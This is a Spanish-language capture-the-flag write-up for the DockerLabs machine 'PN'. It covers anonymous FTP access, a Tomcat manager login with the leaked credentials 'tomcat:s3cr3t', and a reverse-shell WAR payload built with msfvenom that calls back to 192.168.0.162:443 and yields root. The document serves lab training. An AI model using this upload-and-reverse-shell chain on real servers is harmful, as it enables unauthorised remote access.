> For the complete documentation index, see [llms.txt](https://1gnotus.gitbook.io/ignotus_pwn/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://1gnotus.gitbook.io/ignotus_pwn/dockerlabs/writeup/maquina-pn-exploit-upload-.war-tomcat-rce-msfvenom.md).

# MAQUINA PN (EXPLOIT UPLOAD .WAR TOMCAT - RCE 'MSFVENOM')

Iniciamos la maquina.

![](https://2262788210-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Ff1UWZ7xdDAb8KAEfAIlA%2Fuploads%2FGdA4U9ZGWTekUE3IOtII%2F0.png?alt=media)

Hacemos un ping a la ip para ver si tenemos conectividad, el ttl al ser 64 puede indicar que nos estamos enfrentando a una maquina Linux

![](https://2262788210-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Ff1UWZ7xdDAb8KAEfAIlA%2Fuploads%2FGhnmyCz7VgBCNiPCv43Q%2F1.png?alt=media)

Una vez que tengamos la ip usamos nmap para ver los servicios y puertos que corren en la maquina:

![](https://2262788210-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Ff1UWZ7xdDAb8KAEfAIlA%2Fuploads%2FhHUKIB2maNxfLSwNcJPK%2F2.png?alt=media)

El reporte de NMAP nos muestra que en el puerto ftp podemos loguearnos como anonymous entramos dentro sin proporcionar contraseña.

Una vez dentro nos descargamos el archivo tomcat.txt

![](https://2262788210-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Ff1UWZ7xdDAb8KAEfAIlA%2Fuploads%2FIYK1Rs9AVRAC2l2n5mdY%2F3.png?alt=media)

El archivo tomcat.txt nos proporciona un usuario llamado "tomcat"

![](https://2262788210-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Ff1UWZ7xdDAb8KAEfAIlA%2Fuploads%2FhEGC1ca4jBnyZcqRV3u5%2F4.png?alt=media)

Ahora entramos al servidor web que corren en el puerto 8080.

![](https://2262788210-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Ff1UWZ7xdDAb8KAEfAIlA%2Fuploads%2F3GdOiwN88QPuytyvnXIi%2F5.png?alt=media)

Una vez ingresado vamos al apartado donde dice "manager webapp":

Esto nos va a redirigir a un inicio de sesion el cual vamos a utilizar las siguiente credenciales:

`user: tomcat password: s3cr3t`

`Ya estamos dentro del tomcat.`

![](https://2262788210-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Ff1UWZ7xdDAb8KAEfAIlA%2Fuploads%2FWXHtHb3ECIEbHtxJKuac%2F6.png?alt=media)

Hay una opción donde vamos a poder subir un archivo .war.

![](https://2262788210-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Ff1UWZ7xdDAb8KAEfAIlA%2Fuploads%2FMK074xvP8GfXLX12oZFW%2F7.png?alt=media)

Para ellos vamos a usar msfvenom para crear nuestro payload: Este no funciona, pero hay que probar.

![](https://2262788210-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Ff1UWZ7xdDAb8KAEfAIlA%2Fuploads%2FYFUdXQdn8vYZxmXpnF24%2F8.png?alt=media)

Este si funciona

![](https://2262788210-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Ff1UWZ7xdDAb8KAEfAIlA%2Fuploads%2FLW01PuNs5SW9XRn2olQG%2F9.png?alt=media)

`msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.0.162 LPORT=443 -f war > reverse.war`

Lista de payload msfvenom:

[`https://www.nosolohacking.info/msfvenom-creando-diferentes-tipos-de-payloads/`](https://www.nosolohacking.info/msfvenom-creando-diferentes-tipos-de-payloads/)

Una vez subido nos va a aparecer en el inicio, así que con en otra terminal nos ponemos en escucha con netcat y le damos 1 click y esperamos

![](https://2262788210-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Ff1UWZ7xdDAb8KAEfAIlA%2Fuploads%2FHZFWPmZVXz7oHjuGvqrH%2F10.png?alt=media)

![](https://2262788210-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Ff1UWZ7xdDAb8KAEfAIlA%2Fuploads%2FhgHkWSeqcQtB34jggFju%2F11.png?alt=media)

Listo somos usuario root.
